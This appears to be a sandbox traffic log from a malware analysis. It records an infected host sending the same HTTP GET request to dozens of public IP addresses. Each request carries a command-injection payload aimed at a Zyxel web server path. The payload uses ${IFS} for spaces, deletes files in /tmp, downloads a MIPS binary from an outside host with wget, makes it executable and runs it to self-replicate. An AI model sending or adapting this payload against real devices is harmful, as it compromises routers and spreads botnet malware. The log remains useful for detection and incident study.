                                    Jan 13, 2024 19:02:34.187458038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4444192.168.2.1344670192.248.191.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187515974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4445192.168.2.1338132143.68.239.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187599897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4446192.168.2.13579649.102.81.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187674046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4447192.168.2.1346204187.203.77.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187731981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4448192.168.2.1353636205.124.227.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187819004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4449192.168.2.1336560101.231.194.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.187892914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4450192.168.2.1359598196.31.101.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188020945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4451192.168.2.134101066.53.149.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188060999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4452192.168.2.1339652191.208.169.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188152075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4453192.168.2.1350618151.237.16.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188226938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4454192.168.2.133972482.222.35.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188287020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4455192.168.2.135943674.220.7.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188333035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4456192.168.2.1340980104.227.213.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188436031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4457192.168.2.133736050.95.5.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188477993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4458192.168.2.1338990117.217.191.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188566923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4459192.168.2.1336730132.28.155.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188644886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4460192.168.2.1355164112.167.130.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188743114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4461192.168.2.1359584197.3.182.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188812017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4462192.168.2.1350730147.120.89.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188888073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4463192.168.2.135865485.139.202.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.188966990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4464192.168.2.1360378217.102.165.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189032078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4465192.168.2.1336500221.72.231.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189100981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4466192.168.2.1341450195.86.25.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189166069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4467192.168.2.134295276.80.217.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189222097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4468192.168.2.134582682.89.154.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189294100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4469192.168.2.1350102145.246.17.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189343929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4470192.168.2.1337496203.95.5.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189419031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4471192.168.2.133780085.52.145.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189491034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4472192.168.2.1351326181.249.212.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189589977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4473192.168.2.1339960220.223.67.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189646006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4474192.168.2.13337288.220.62.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189712048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4475192.168.2.1356328145.153.138.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189769030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4476192.168.2.1358990165.102.61.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189848900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4477192.168.2.1348270195.153.186.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189934969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4478192.168.2.135512488.19.232.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.189949989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4479192.168.2.135701267.226.212.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190006018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4480192.168.2.1353740130.62.126.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190104961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4481192.168.2.1358526131.229.176.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190191031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4482192.168.2.135348623.45.108.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190262079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4483192.168.2.1355256151.25.94.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190318108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4484192.168.2.1356266201.249.28.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190422058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4485192.168.2.1353710212.32.178.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190471888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4486192.168.2.1358130221.142.163.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190555096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4487192.168.2.134937677.7.237.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190623999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4488192.168.2.1357218128.242.31.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190722942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4489192.168.2.13378549.34.5.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190784931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4490192.168.2.133757843.126.252.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190836906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4491192.168.2.1334026124.133.22.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190926075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4492192.168.2.134255878.62.82.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.190963030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4493192.168.2.1358128137.137.118.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191055059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4494192.168.2.1333552175.83.217.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191149950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4495192.168.2.134203297.214.234.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191227913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4496192.168.2.135832239.14.76.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191318035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4497192.168.2.1346056216.114.50.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191409111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4498192.168.2.1338380117.25.189.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191472054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4499192.168.2.1335148153.1.73.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191540003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4500192.168.2.1333012131.200.120.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191595078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4501192.168.2.1349238135.26.234.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191683054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4502192.168.2.1358702111.171.200.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191764116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4503192.168.2.1341370181.210.202.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191848040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4504192.168.2.1339510102.83.33.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.191956043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4505192.168.2.134401693.115.216.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192004919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4506192.168.2.13596082.185.62.171443
                                    TimestampBytes transferredDirectionData
